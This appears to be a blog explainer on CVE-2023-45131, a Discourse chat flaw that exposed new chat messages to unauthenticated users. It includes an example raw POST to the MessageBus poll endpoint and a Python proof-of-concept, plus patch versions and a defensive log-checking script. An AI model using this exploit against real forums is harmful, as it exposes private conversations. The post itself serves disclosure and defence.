_Discovered in late 2023, CVE-2023-45131 is a security hole in Discourse’s chat component that could let attackers spy on new chat messages—without even logging in. This post breaks down what went wrong, shows example exploit requests, explains what Discourse did to patch it, and gives tips on how to stay secure._
What is Discourse, and Why Should You Care?
Discourse is a popular open source platform for community discussion. Many online forums, gaming guilds, and even companies use Discourse for chat and message boards. That makes vulnerabilities in Discourse a big deal—the software can power sensitive or high-profile communities.
What Went Wrong: The MessageBus Endpoint
One part of Discourse is “chat”—a real-time feature that lets users talk as if they’re on Slack or Discord. To keep chat messages live, Discourse uses something called MessageBus, which lets the frontend and backend quickly push and receive messages.
CVE-2023-45131 was discovered because attackers could make unauthenticated HTTP POST requests to a specific MessageBus endpoint, and get chat messages they shouldn’t have access to. In simpler terms: you didn’t even need to log in! Any random person could fetch and read new chat content.
Here’s the Exploit in Action
Imagine your Discourse site’s URL is https://example.com.
A malicious user could send an HTTP POST to the MessageBus polling endpoint like this:
POST /message-bus/05f3e2d4b1b24713afe333f3bc14d1/poll HTTP/1.1
Host: example.com
Content-Type: application/json

{
  "channels": [
    "/chat/1234",
    "/chat/5678"
  ],
  "last_id":
}
With this request, the attacker can poll chat channels and get messages—even if they’re not logged in, or shouldn’t see these messages.
Here’s a simplified Python script to demonstrate the exploit (educational use only!):
import requests

site_url = "https://example.com"  # the Discourse site being checked
poll_endpoint = "/message-bus/05f3e2d4b1b24713afe333f3bc14d1/poll"
json_data = {
    "channels": [
        "/chat/1234"  # Replace with real channel ID
    ],
    "last_id": 0,  # placeholder: the original post leaves this value blank
}
# No cookies and no auth headers are sent; that missing check is the bug.
resp = requests.post(site_url + poll_endpoint, json=json_data)
print(resp.text)
If the site is vulnerable and you use a valid chat channel ID, it might return live message content.
After the fix, unauthenticated POST requests to the polling endpoint no longer return chat data.
There is no workaround for this bug—if your Discourse is older than 3.1.1 (stable) or 3.2.0.beta2 (beta), you’re at risk and should upgrade.
You can read the official GitHub security advisory and patch commit here:
- Discourse CVE-2023-45131 Security Advisory
- Patch Commit Example
Monitor for Unusual Activity
Check your logs for strange POST requests to /message-bus/.../poll without sessions or authentication headers.
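As an added defensive example (not code from the original post or from Discourse), here is a small log check that implements the advice above: it parses web-server access lines and flags clients that repeatedly POST to the poll endpoint without a Discourse session cookie. It assumes an nginx log format that appends `$http_cookie` to each line and that the session cookie is named `_t`; the log lines are constructed.

```python
import re
from collections import Counter

# Assumed nginx log_format (an assumption for this example, not a Discourse default):
#   '$remote_addr - $remote_user [$time_local] "$request" $status $body_bytes_sent '
#   '"$http_referer" "$http_user_agent" "$http_cookie"'
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \d+ "[^"]*" "[^"]*" "(?P<cookie>[^"]*)"$'
)
POLL_RE = re.compile(r"^/message-bus/[0-9a-f]+/poll")
SESSION_COOKIE = "_t"  # Discourse's auth-token cookie; absent on anonymous requests


def is_anonymous_poll(line):
    """True for a POST to the MessageBus poll endpoint with no Discourse session cookie."""
    m = LOG_RE.match(line)
    if not m or m["method"] != "POST" or not POLL_RE.match(m["path"]):
        return False
    names = {c.strip().split("=", 1)[0] for c in m["cookie"].split(";") if c.strip()}
    return SESSION_COOKIE not in names


def flag_pollers(lines, threshold=3):
    """Map IP -> number of anonymous poll POSTs, keeping IPs at or above threshold."""
    counts = Counter(LOG_RE.match(l)["ip"] for l in lines if is_anonymous_poll(l))
    return {ip: n for ip, n in counts.items() if n >= threshold}


# Constructed sample log lines (not real traffic); the bus id is the one used above.
POLL = "/message-bus/05f3e2d4b1b24713afe333f3bc14d1/poll"
SAMPLE_LOG = [
    # logged-in browser polling normally: carries the _t session cookie
    f'203.0.113.5 - - [16/Oct/2023:22:15:12 +0000] "POST {POLL} HTTP/1.1" 200 512 '
    '"https://example.com/chat" "Mozilla/5.0" "_t=REDACTED; _forum_session=REDACTED"',
    # anonymous visitor loading a page: not a poll, so ignored
    '198.51.100.9 - - [16/Oct/2023:22:15:13 +0000] "GET /latest HTTP/1.1" 200 9000 '
    '"-" "Mozilla/5.0" "-"',
] + [
    # one client repeatedly POSTing to the poll endpoint with no cookies at all
    f'198.51.100.7 - - [16/Oct/2023:22:15:{14 + i} +0000] "POST {POLL} HTTP/1.1" '
    '200 2048 "-" "python-requests/2.31.0" "-"'
    for i in range(3)
]

if __name__ == "__main__":
    print(flag_pollers(SAMPLE_LOG))  # {'198.51.100.7': 3}
```

Anonymous visitors on a public site also poll MessageBus, so a single cookieless poll is not evidence on its own; the per-IP volume is what stands out, and the channel list (the request body) is not in access logs, so this check cannot tell chat channels from other subscriptions.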
Original References
- Discourse Advisory on GitHub
- NIST NVD Entry CVE-2023-45131
_If you run Discourse, double-check your version today. Attackers don’t need much—don’t make it easy for them!_
Timeline
Published on: 10/16/2023 22:15:12 UTC
Last modified on: 10/19/2023 17:55:24 UTC